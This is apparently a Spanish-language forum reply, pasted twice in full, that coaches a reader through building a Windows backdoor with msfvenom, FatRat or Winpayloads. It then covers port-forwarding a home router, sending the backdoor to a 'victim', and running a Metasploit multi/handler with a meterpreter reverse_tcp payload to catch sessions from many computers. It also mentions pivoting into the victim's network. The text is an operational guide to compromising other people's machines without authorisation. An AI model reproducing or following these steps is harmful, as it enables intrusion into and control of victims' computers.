puedes hacer lo que deseas
te explico algunois detalles que debes de tener en cuenta
al momento de generar el backdoor, puedes hacerlo con msfvenon, fatrat o winpayloads (que es mi favorito) debes de colocar la ip publica de tu compuadora de la casa, esa ip publica puedes obtenerla desde la terminar de kali con el comando:
curl ifconfig.me
en la creacion del backdoor debes de elegir un puerto, ej: 4445
ok despues que tengas el backdoor creado con tu ip publica debes de ingresar a la configuracion de tu router y abrir ese puerto, osea asignarle ese puerto a la ip privada de tu computadora
(puedes buscar en youtube como abrir puertos en router "tal marca" ya que ese paso es bien importante para recibir la conexion, y en ese paso es que fallan muchas personas porque al no abrir correctamente los puertos no podras recibir la conexion reversa)
Sino deseas involucrar tu ip publica directamente hay un manera de hacerlo con una ddns de noip.com pero ya eso es otro asunto que debes de profundizar despues que sepas como obtener la sesion meterpreter
Ok despues que abras los puertos y tengas tu backdoor debes de enviarlo a la victima pero antes debes de tener metasploit en escucha en tu Kali linux te dejo los comanndos a continuacion:
service postgresql start ( para iniciar el servicio de base de datos)
msfconsole ( para abrir la consola metasploit)
use multi/handler ( para usar el exploit multi handler que es el encargado de recibir la conexion)
set payload windows/meterpreter/reverse_tcp (eso es para seleccionar el payload con el cual configuraste tu backdoor, yo supongo que usaste este, pero al momento de crear el backdoor podras usar otros payloads que debes de seleccionarlo en este paso, este es el mas comun y sencillo)
set lhost 192.168.x.x (aqui debes de colocar la ip privada de tu kali, muchos aqui ponen la ip publica suponiendo que estan usando la ip publica en la creacion del backdoor pero el detalle esta que al tu asignarle el puerto a ese ip privada en la configuracion de tu router, todas las conexiones entrantes a tu ip publica sera redirigida a ese puerto de esa ip privada, podras ver la ip privada abriendo otra ventana y usando el comando ifconfig)
set lport 4445 (para seleccionar el puerto, dije que usaria como ejemplo 4445 pero puedes usar el que tu hayas usados al momento de crear el backdoor)
exploit -j (hay ya tendras metasploit en escucha, se usa el -j para que recibas todas las conexiones que quieras, es decir podras ejecutar tu backdoor en varias computadoras y recibiras todas las sesiones meterpreter sin problemas)
Y bueno hay ya deberias de tener una sesion meterpreter con computadoras en diferentes redes, No soy un experto, tambien estoy en proceso de aprendisaje pero ya en este momento creo que supere la etapa inicial que es donde creo que estas, ahorita estoy aprendiendo otras cosas, como por ejemplo usar arp, route y portfwd en la sesion meterpreter para tomar el control de las otras computadoras que esten en la red de la pc victima, tambien estoy aprendiendo como migrar la sesion meterpreter fuera de metasploit son un socks para poder usar otras herramientas de kali con la pc victima...
Espero te haya ayudado!
te explico algunois detalles que debes de tener en cuenta
al momento de generar el backdoor, puedes hacerlo con msfvenon, fatrat o winpayloads (que es mi favorito) debes de colocar la ip publica de tu compuadora de la casa, esa ip publica puedes obtenerla desde la terminar de kali con el comando:
curl ifconfig.me
en la creacion del backdoor debes de elegir un puerto, ej: 4445
ok despues que tengas el backdoor creado con tu ip publica debes de ingresar a la configuracion de tu router y abrir ese puerto, osea asignarle ese puerto a la ip privada de tu computadora
(puedes buscar en youtube como abrir puertos en router "tal marca" ya que ese paso es bien importante para recibir la conexion, y en ese paso es que fallan muchas personas porque al no abrir correctamente los puertos no podras recibir la conexion reversa)
Sino deseas involucrar tu ip publica directamente hay un manera de hacerlo con una ddns de noip.com pero ya eso es otro asunto que debes de profundizar despues que sepas como obtener la sesion meterpreter
Ok despues que abras los puertos y tengas tu backdoor debes de enviarlo a la victima pero antes debes de tener metasploit en escucha en tu Kali linux te dejo los comanndos a continuacion:
service postgresql start ( para iniciar el servicio de base de datos)
msfconsole ( para abrir la consola metasploit)
use multi/handler ( para usar el exploit multi handler que es el encargado de recibir la conexion)
set payload windows/meterpreter/reverse_tcp (eso es para seleccionar el payload con el cual configuraste tu backdoor, yo supongo que usaste este, pero al momento de crear el backdoor podras usar otros payloads que debes de seleccionarlo en este paso, este es el mas comun y sencillo)
set lhost 192.168.x.x (aqui debes de colocar la ip privada de tu kali, muchos aqui ponen la ip publica suponiendo que estan usando la ip publica en la creacion del backdoor pero el detalle esta que al tu asignarle el puerto a ese ip privada en la configuracion de tu router, todas las conexiones entrantes a tu ip publica sera redirigida a ese puerto de esa ip privada, podras ver la ip privada abriendo otra ventana y usando el comando ifconfig)
set lport 4445 (para seleccionar el puerto, dije que usaria como ejemplo 4445 pero puedes usar el que tu hayas usados al momento de crear el backdoor)
exploit -j (hay ya tendras metasploit en escucha, se usa el -j para que recibas todas las conexiones que quieras, es decir podras ejecutar tu backdoor en varias computadoras y recibiras todas las sesiones meterpreter sin problemas)
Y bueno hay ya deberias de tener una sesion meterpreter con computadoras en diferentes redes, No soy un experto, tambien estoy en proceso de aprendisaje pero ya en este momento creo que supere la etapa inicial que es donde creo que estas, ahorita estoy aprendiendo otras cosas, como por ejemplo usar arp, route y portfwd en la sesion meterpreter para tomar el control de las otras computadoras que esten en la red de la pc victima, tambien estoy aprendiendo como migrar la sesion meterpreter fuera de metasploit son un socks para poder usar otras herramientas de kali con la pc victima...
Espero te haya ayudado!